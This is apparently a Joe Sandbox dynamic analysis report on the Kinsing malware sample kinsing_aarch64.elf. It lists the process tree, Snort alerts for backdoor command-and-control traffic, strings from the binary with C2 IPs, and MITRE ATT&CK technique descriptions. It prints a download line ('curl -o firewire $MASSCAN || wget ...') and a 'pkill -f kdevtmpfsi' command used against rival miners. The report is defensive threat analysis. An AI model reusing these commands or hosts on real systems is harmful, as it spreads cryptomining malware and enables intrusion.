2023-11-29 17:00:38 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:38 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:38 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

System Behavior

Analysis Process: kinsing_aarch64.elf PID: 6209, Parent PID: 6124

General

Start time (UTC):	16:58:50
Start date (UTC):	29/11/2023
Path:	/tmp/kinsing_aarch64.elf
Arguments:	/tmp/kinsing_aarch64.elf
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Start time (UTC):	16:58:50
Start date (UTC):	29/11/2023
Path:	/tmp/kinsing_aarch64.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Start time (UTC):	16:58:50
Start date (UTC):	29/11/2023
Path:	/tmp/kinsing_aarch64.elf
Arguments:	/tmp/kinsing_aarch64.elf
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Start time (UTC):	17:00:00
Start date (UTC):	29/11/2023
Path:	/tmp/kinsing_aarch64.elf
Arguments:	-
File size:	5706200 bytes
MD5 hash:	02e8e39e1b46472a60d128a6da84a2b8

Start time (UTC):	17:00:00
Start date (UTC):	29/11/2023
Path:	/usr/bin/sh
Arguments:	sh -c "pkill -f kdevtmpfsi"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	17:00:00
Start date (UTC):	29/11/2023
Path:	/usr/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	17:00:00
Start date (UTC):	29/11/2023
Path:	/usr/bin/pkill
Arguments:	pkill -f kdevtmpfsi
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51150 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51154 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51158 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51162 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51166 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51170 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51174 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51180 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51178 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030109 ET TROJAN nspps Backdoor - Sending SOCKS Details 192.168.2.23:51178 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51182 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51190 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51192 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51198 -> 185.154.53.140:80
Source: Traffic	Snort IDS: 2030108 ET TROJAN nspps Backdoor CnC Activity 192.168.2.23:51204 -> 185.154.53.140:80

Source: kinsing_aarch64.elf	String: (curl -o firewire $MASSCAN \|\| wget -O firewire $MASSCAN)
Source: kinsing_aarch64.elf	String: (curl -o firewire $MASSCAN \|\| wget -O firewire $MASSCAN)

Source: unknown	Network traffic detected: HTTP traffic on port 52164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52160
Source: unknown	Network traffic detected: HTTP traffic on port 52176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52164
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52184
Source: unknown	Network traffic detected: HTTP traffic on port 52180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52208
Source: unknown	Network traffic detected: HTTP traffic on port 52184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52168
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52204
Source: unknown	Network traffic detected: HTTP traffic on port 52196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52192
Source: unknown	Network traffic detected: HTTP traffic on port 52208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52194
Source: unknown	Network traffic detected: HTTP traffic on port 52202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52204 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 212.22.77.79
Source: unknown	TCP traffic detected without corresponding DNS query: 212.22.77.79
Source: unknown	TCP traffic detected without corresponding DNS query: 212.22.77.79
Source: unknown	TCP traffic detected without corresponding DNS query: 212.22.77.79
Source: unknown	TCP traffic detected without corresponding DNS query: 212.22.77.79

Source: kinsing_aarch64.elf	String found in binary or memory: http://185.61.7.8;http://67.205.161.58;http://104.248.3.165runtime:
Source: kinsing_aarch64.elf	String found in binary or memory: http://47.65.90.240if-unmodified-sinceillegal
Source: kinsing_aarch64.elf	String found in binary or memory: http://api.ipify.orgi/o
Source: kinsing_aarch64.elf	String found in binary or memory: http://ifconfig.coidentifier
Source: kinsing_aarch64.elf	String found in binary or memory: http://ipv4.icanhazip.comillegal
Source: kinsing_aarch64.elf	String found in binary or memory: https://github.com/go-resty/resty)got

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report kinsing_aarch64.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/.ICEd-unix/uuid

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

System Behavior

Analysis Process: kinsing_aarch64.elf PID: 6209, Parent PID: 6124

General

File Activities

File Opened

File Read

Process Activities

Process Forked

Signal sent

System Activities

Query System Information (uname)

Chronological Activities

Linux Analysis Report
kinsing_aarch64.elf